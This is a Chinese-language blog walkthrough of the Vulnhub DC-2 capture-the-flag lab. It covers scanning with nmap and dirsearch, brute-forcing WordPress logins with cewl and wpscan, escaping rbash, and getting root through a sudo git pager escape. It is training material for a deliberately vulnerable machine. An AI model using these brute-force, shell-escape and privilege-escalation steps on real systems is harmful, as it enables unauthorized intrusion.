Vulnhub靶机:DC-2渗透详细过程

靶机下载地址放在文章最后啦

一、靶机的搭建

1.打开文件夹右击使用VM虚拟机打开

图片

2.给虚拟机取个名字(我这里就直接DC-2),选择自己虚拟机存放的位置

图片

3.如果遇到这个问题直接点击重试即可

图片

4.等待虚拟机的导入

图片

5.虚拟机网络默认的桥接模式,直接开启虚拟机即可

图片

6.靶场的登录界面(不知道密码和账号)

图片

二、渗透过程

1.直接上nmap扫一下存活的IP地址

我这里IP地址有点多,204这台机子应该就是DC-2靶机IP了

nmap -sV -p- 192.168.2.0/24

图片

2.再用nmap扫一下开放的端口

nmap -sV -p- 192.168.2.204

图片

3.发现只开放了 80http和7744ssh两个端口,先访问80端口看看

http://192.168.2.204

图片

4.在这里访问了很久,跳转到这个界面,现在我们需要修改hosts文件

su root

vim /etc/hosts

图片

5.进入hosts文件,把域名和IP地址添加进去

192.168.2.204 dc-2

图片

6.再次访问dc-2,发现成功进入到网站,并获取到一个flag

http://dc-2/

图片

7.flag1翻译:

你通常的单词表可能不起作用,所以,也许你只需要使用cewl。

密码越多越好,但有时你无法赢得所有密码。

以一个身份登录以查看下一个flag。

如果找不到,请以其他身份登录。

图片

8.我们先用dirsearch扫一下网站的目录看看,我们发现了wp的后台管理登录界面。

dirsearch -u http://dc-2/

图片

图片

9.在flag1说到我们需要使用cewl来生成密码字典。

cewl http://dc-2/ -w passwd.txt

图片

10.使用 wpscan穷举 WordPress 网站中注册过的用户名,来制作用户名字典。

wpscan -url http://dc-2/ -e u

图片

11.我们发现了三个用户名,把他制作成用户名字典。

图片

图片

12.再使用wpscan对后台进行爆破,成功爆破出两个用户名和密码。

wpscan --url http://dc-2/ -U user.txt -P passwd.txt

图片

图片

13.使用jerry用户登录看看,登录成功。

图片

14.我们到处点点看,在pages里面发现flag2。

图片

图片

15.flag2翻译

如果你不能利用WordPress并采取快捷方式,还有另一种方法。 希望你找到了另一个切入点。

16.我们最初用nmap扫描时发现还开放一个7744ssh端口,我们尝试使用jerry账户来连接ssh ,发现连接失败。

图片

17.再用tom来连接,发现连接成功。

ssh tom@192.168.2.204 -p 7744

图片

18.whoami一下查看一下当前的权限,发现rbash,在ls看看里面的文件flag3.

图片

19.用cat发现打开不了,又使用vim也还是不行,最后用vi成功打开了。

图片

图片

120.flag3翻译

可怜的汤姆总是追着杰瑞跑,也许他应该他应该为自己创造成所以的压力和道歉。

21.我们发现flag3里面有su,和翻译的那一句话,我们应该绕过rbash切换到jerry用户上去。

BASH_CMDS[su]=/bin/sh

su

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin/

whoami

图片

22.切换到jerry

su jerry

图片

23.尝试用jerry用户找一下flag4

图片

24.flag4翻译

很高兴看到你已经走到了这一步——但你还没有回家。 您仍然需要获得最终标志(唯一真正重要的flag!!!) 这里没有任何提示——你现在就靠你自己了。 继续 - 离开这里!!!!

25.现在我们是jerry用户,应该需要我们提权到root用户,使用sudo -l提权一下,发现不行,我们看到可以使用git提权。

sudo -l

图片

26.使用git提权

sudo git -p help config

图片

!/bin/sh

图片

whoami一下是root用户提权成功

图片

27.用root用户找一下最后的flag,最后在根目录里root文件夹里找到的flag

图片

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-2"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值